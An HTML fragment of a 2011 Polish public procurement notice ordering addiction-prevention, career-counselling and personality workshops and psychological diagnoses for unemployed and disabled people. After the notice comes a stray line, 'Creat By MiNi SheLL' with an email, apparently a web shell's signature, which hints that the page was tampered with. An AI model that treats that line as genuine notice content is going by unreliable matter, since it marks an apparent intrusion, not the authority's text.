<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie 27 godzin warsztatów w zakresie profilaktyki uzależnień dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, pracujących pozostających w niekorzystnej sytuacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie 27 godzin warsztatów w zakresie profilaktyki uzależnień dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, pracujących pozostających w niekorzystnej sytuacji

 Zakres tematyczny warsztatów:  - nowe uzależnienia, 
                                                      - alkoholizm,
                                                      - lekomania,
                                                      - leczenie uzależnień

Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich  szczegółowym programem.
Forma realizacji warsztatów:      - 3 grupy x 9 h każda po 16 osób łącznie 27 h.
                                                     - zajęcia w godzinach 16:00-19:15
                                                     - 1 spotkanie trwa 3 godziny plus 15 przerwa na posiłek 
                                                          (zapewniony przez Zamawiającego),
                                                      - zamawiający udostępnia pomieszczenia do realizacji          zajęć, laptop, projektor, ekrany, flipcharty, papier               do flipchartów, kserokopiarkę, internet
     
Wykonawca zapewnia każdemu uczestnikowi zajęć materiały dydaktyczne oznaczone przekazanymi przez zamawiającego logo projektu, przekazując 1 egz. lub komplet zamawiającemu.
Wykonawca przeprowadza wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie przekazanych przez zamawiającego ankiet oceniających; dostarczając je zamawiającemu w ciągu 7 dni od daty zakończenia zajęć.
Wykonawca w ciągu 7 dni od daty zakończenia zajęć z każdą grupą opracowuje opis procesu grupowego i doręcza zamawiającemu.
Wszystkie materiały przygotowane przez Wykonawcę muszą być opatrzone przekazanymi przez zamawiającego logo projektu.
Ilość osób skierowanych na szkolenie może ulec zmianie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeprowadzenie 24 godzin warsztatów w zakresie doradztwa zawodowego dla 12 osób
     bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych dążących do umocnienia pozycji zawodowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie 24 godzin warsztatów w zakresie doradztwa zawodowego dla 12 osób
     bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych dążących do umocnienia pozycji zawodowej.
    Zakres tematyczny warsztatów: - metoda edukacyjna w doradztwie zawodowym   adresowana do osób, które są aktywne w dążeniu do usamodzielnienia i rozwoju życiowego oraz zawodowego ale nadal nie mogą sprecyzować projektu zawodowego, brakuje im orientacji zawodowej zarówno w odniesieniu do swoich możliwości zawodowych, jak też do wymagań i oferty rynku pracy, 
                                                                - etapy procesu decyzyjnego
Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich  szczegółowym programem.
Forma realizacji warsztatów:       - 1 grupa x 24 h 12 osób,
                                                     - zajęcia w godzinach 15:00-18:15
                                                     - 1 spotkanie trwa 3 godziny plus 15 przerwa na posiłek 
                                                          (zapewniony przez Zamawiającego),
                                                      - zamawiający udostępnia pomieszczenia do realizacji          zajęć, laptop, projektor, ekrany, flipcharty, papier               do flipchartów, kserokopiarkę, internet

Wykonawca zapewnia każdemu uczestnikowi zajęć materiały dydaktyczne oznaczone przekazanymi przez zamawiającego logo projektu, przekazując 1 egz. lub komplet zamawiającemu.
Wykonawca przeprowadza wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie przekazanych przez zamawiającego ankiet oceniających; dostarczając je zamawiającemu w ciągu 7 dni od daty zakończenia zajęć.
Wykonawca w ciągu 7 dni od daty zakończenia zajęć z każdą grupą opracowuje opis procesu grupowego i doręcza zamawiającemu.
Wszystkie materiały przygotowane przez Wykonawcę muszą być opatrzone przekazanymi przez zamawiającego logo projektu.
Ilość osób skierowanych na szkolenie może ulec zmianie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przeprowadzenie 15 godzin warsztatów w zakresie rozwoju osobowości dla 12 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych dążących do umocnienia pozycji zawodowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie 15 godzin warsztatów w zakresie rozwoju osobowości dla 12 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych dążących do umocnienia pozycji zawodowej.
Zakres tematyczny warsztatów: -  trening asertywności adresowany do osób, które są aktywne w dążeniu do usamodzielnienia i rozwoju życiowego oraz zawodowego ale nadal nie mogą sprecyzować projektu zawodowego, brakuje im orientacji zawodowej zarówno w odniesieniu do swoich możliwości zawodowych, jak też do wymagań i oferty rynku pracy, 
                                                       - etapy procesu decyzyjnego

Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich  szczegółowym programem.
Forma realizacji warsztatów:       - 1 grupa x 15 h 12 osób,
                                                     - zajęcia w godzinach 15:00-18:15
                                                     - 1 spotkanie trwa 3 godziny plus 15 przerwa na posiłek 
                                                          (zapewniony przez Zamawiającego),
                                                      - zamawiający udostępnia pomieszczenia do realizacji          zajęć, laptop, projektor, ekrany, flipcharty, papier               do flipchartów, kserokopiarkę, internet

Wykonawca zapewnia każdemu uczestnikowi zajęć materiały dydaktyczne oznaczone przekazanymi przez zamawiającego logo projektu, przekazując 1 egz. lub komplet zamawiającemu.
Wykonawca przeprowadza wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie dostarczonej przez zamawiającego ankiety oceniającej dostarczając je zamawiającemu w ciągu 7 dni od daty zakończenia zajęć.
Wykonawca w ciągu 7 dni od daty zakończenia zajęć z każdą grupą opracowuje opis procesu grupowego i doręcza zamawiającemu.
Wszystkie materiały przygotowane przez Wykonawcę muszą być opatrzone przekazanymi przez zamawiającego logo projektu.
Ilość osób skierowanych na szkolenie może ulec zmianie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przeprowadzenie 144 h zajęć w zakresie doradztwa zawodowego, opracowanie Indywidualnego Planu Działania (IPD) dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych w niekorzystnej sytuacji ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie 144 h zajęć w zakresie doradztwa zawodowego, opracowanie Indywidualnego Planu Działania (IPD) dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych w niekorzystnej sytuacji .
     Badanie realizuje i IPD opracowuje doradca zawodowy.
     Forma realizacji zajęć:    - 48 osób x 3 h łącznie 144 h.
    Wykonawca w ciągu 7 dni od daty zakończenia pracy z uczestnikami projektu doręczy    Zamawiającemu 48 IPD każdy oznaczony logo projektu.
    Ilość osób skierowanych na szkolenie może ulec zmianie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przeprowadzenie 144 h zajęć  w zakresie rozwoju osobowości, opracowanie  indywidualnej diagnozy psychologicznej dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych w niekorzystnej sytuacji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie 144 h zajęć  w zakresie rozwoju osobowości, opracowanie  indywidualnej diagnozy psychologicznej dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych w niekorzystnej sytuacji.
     Badanie realizuje i diagnozy opracowuje psycholog.
     Forma realizacji zajęć:    - 48 osób x 3 h łącznie 144 h.
     Zamawiający udostępni wykonawcy testy KKS, CISS, PKIE, FCZ-KT i pomoce do ich analizy.
     Wykonawca w ciągu 7 dni od daty zakończenia pracy z uczestnikami projektu doręczy zamawiającemu 48 indywidualnych diagnoz psychologicznych, oznaczonych logo projektu.
    Ilość osób skierowanych na szkolenie może ulec zmianie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przeprowadzenie 20 h warsztatów w zakresie rozwoju osobowości, opracowanie indywidualnej diagnozy psychologicznej dla 10 osób niepełnosprawnych z zaburzeniami psychicznymi zdolnych do podjęcia aktywizacji społecznej, zdrowotnej oraz w ograniczonym stopniu edukacyjnej (niezdolnych do podjęcia aktywizacji zawodowej) oraz 5 osób z najbliższego otoczenia społecznego uczestników..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie 20 h warsztatów w zakresie rozwoju osobowości, opracowanie indywidualnej diagnozy psychologicznej dla 10 osób niepełnosprawnych z zaburzeniami psychicznymi zdolnych do podjęcia aktywizacji społecznej, zdrowotnej oraz w ograniczonym stopniu edukacyjnej (niezdolnych do podjęcia aktywizacji zawodowej) oraz 5 osób z najbliższego otoczenia społecznego uczestników.
     Warsztaty z psychiatrycznym terapeutą środowiskowym.
     Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich    szczegółowym programem.

     Zakres tematyczny warsztatów: - emocje, uczucia, agresja, krzywda, przebaczanie,  asertywność

     Forma realizacji warsztatów:       - 1 grupa x 20 h dla 15 osób tj. 10 uczestników projektu i  5 osób z najbliższego otoczenia społecznego w ramach wsparcia towarzyszącego,
                                                              - 1 spotkanie - 1,5 godziny
                                                              - zajęcia w godzinach 15:05-16:35
                                                              -zamawiający udostępni pomieszczenia do realizacji  zajęć, flipchart, papier do flipchartów, flamastry

Wykonawca zapewni wszystkim uczestnikom materiały dydaktyczne oznaczone logo projektu, jeden komplet wykonawca przekaże zamawiającemu.
Wykonawca przeprowadzi wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie przekazanej przez zamawiającego ankiety oceniającej.
Wykonawca w ciągu 7 dni od daty zakończenia pracy z każdą grupą opracuje opis procesu grupowego i doręczy go zamawiającemu; wykonawca oznaczy opis logo projektu.	
Ilość osób skierowanych na szkolenie może ulec zmianie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com